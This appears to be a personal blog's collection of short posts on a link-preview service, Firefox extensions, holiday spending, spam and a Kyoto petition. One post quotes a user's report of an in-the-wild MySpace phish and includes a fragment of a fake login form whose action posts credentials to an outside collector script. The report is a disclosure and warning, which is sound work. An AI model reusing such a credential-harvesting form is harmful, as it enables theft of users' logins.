Hamarana

Changed my mind.

Who knew!

A newish search company, snap, is offering a preview for links on one’s site. Its interesting, some links take forever to load, some never seem to (apparently its a queue issue), and others literally “snap” into existence. Perhaps they have already been “snapped” by someone else.

Anyway, to experience it, just roll your mouse over any link and with any luck you will get a thumbnail preview of the site at that link.

(Currently disabled, it was really starting to annoy me. Go look at Photomatt instead)

Additionally, if you use Firefox, you can add Snap to your list of search options for your toolbar.

Found via PhotoMatt where its in use

Cross-Site Forms + Password Manager = Security Failure

A firefox user reported the following:

I was shocked today to find an in-the-wild phish that uses nothing more than cross-site forms, and also extracts information from the Password Manager!

The underlying method was so obvious that it should have raised multiple warnings. There were none at all.

It was in a MySpace profile that included this tag:

.. form name=”2″ action=”http://membres.lycos.fr/adel88duran/plaguedoctor.php” method=”post”…

What followed was a nearly perfect-looking MySpace login form that used simple HTML and absolute positioning.

Not only did FireFox fail to raise a warning, it auto-filled my www.myspace.com username and password into this form!! I hope anyone reading this realizes it is a security failure for the browser to auto-fill the membres.lycos.fr form with credentials from another website.

I even confirmed in the password manager that I do not have any passwords saved for the membres.lycos.fr domain.

I realize there is a consideration for cross-site functionality on certain subdomains. However, I must say I am shocked that FireFox lacks a warning for both the POST element and the Password Manager in this case.

I would have been thoroughly fooled by this page were it not for a tiny formatting error that the phisher overlooked, and could have been easily fixed. An unsuspecting user would only have to click the Login button on this legitimate-looking page for the phish to be complete.

This appears to be a huge problem! I look forward to your response.

Read about it at Bugzilla

and delete your firefox passwords if you have been storing them.

Its the time of year in which I really start missing my Mum and Dad. Its also the time of year in which I start turning into Scrooge. Not because I have no streak of generosity or giving within me, but because of the increasing pressures on people to spend more and more money.

I was watching commercial TV last night and it seemed to me that every second advertisement was designed to encourage spending more and more and more (not just for Christmas, but just generally). There were a number of different advertisements for cars, and I got to thinking, just how many cars can one person want to buy? Nobody can afford to change their car every year, and yet, manufacturers spend billions in developing and creating new models which they then expect people will fall over themselves to buy. We only have 20 million people in this country … geeze! Then there IS the Christmas thing which is looming. When did *you* last buy someone a car for Christmas? Or a house full of furniture? Are these advertisers serious???

Oh yeah… and the junkmail is coming thick and fast. Every second item seems to be full of toys for kids. But, when you get past the dolls and toylike things, you find BIG PRICE ITEMS! When did a computer or a bicycle or a mobile phone become toys, for heavens sake??? I’m over it.

BAH, HUMBUG!!

I keep coming back to Firefox as my browser of choice because of the plethora of extensions available for it (though there are only a few I use regularly). I was going to write of just one here, but now, I think I’ll just list those I find most useful, and why (in no particular order).

1. Adblock Plus: Lets you block dross on the net. Rightclick and banish a banner/server forever.
2. Adblock Filterset.G Updater: This retrieves an updated set of filters which work in Adblock and AdblockPlus. You still need to do your own blocking but this gives a head start.
3. Temporary Inbox: Gives you a disposable email address which is good for 6 hours. Excellent for signing up at sites which you know are going to generate tons of spam, just so you can get to see what you want to. Not good if your email address is needed in any ongoing way.
4. gMail Manager: Puts a notification area into your statusbar and allows checking of multiple gMail accounts, unlike most which check only one. Also gives you snippets of available mail.
5. Scrapbook: Collecting information has never been so easy (except with the iHarvest IE extension which is old and no longer supported). Make your own database of collected info. Excellent for researchers.
6. Videodownloader: I confess to not using this much, but if I want to, I can get videos of most kinds from most sites.
7. BBCodeXtra: If you frequent forums, you’ll find most of them use BBCode or a version of it, to display such things as bold type, different colour fonts etc. A right click in the window and selection from the context sensitive menu makes it easy to use. Works for Invision and vBulletin that I know of, and probably for phpBB as well, but I havent tried it there myself.

I have a few more extensions but these are my favourites

Reluctantly, I have had to delete my contact form. I put it there so people could contact me instead of hunting around on the site for an email address which doesnt exist. Unfortunately the spammers and scammers have now discovered that they can spam contact forms as effectively as anything else, and I have been getting increasing numbers of emailed spam via the form.

Please use the guestbook if you have a non-post related question. At least Akismet can work its magic on that

Australia and the USA have still not signed up to the Kyoto Agreement. Our respective governments have done pretty much SFA about reducing greenhouse emissions. Just enough to make it look ok once in a while, whilst keeping the banks and oil companies on side (hate to see all that sponsorship money disappear eh?)

So now you can sign a petition which will be presented to the Australian government, for Australia to become engaged with the Kyoto Protocol.

Here’s the site, go sign. It might not make a difference, but we have to try something.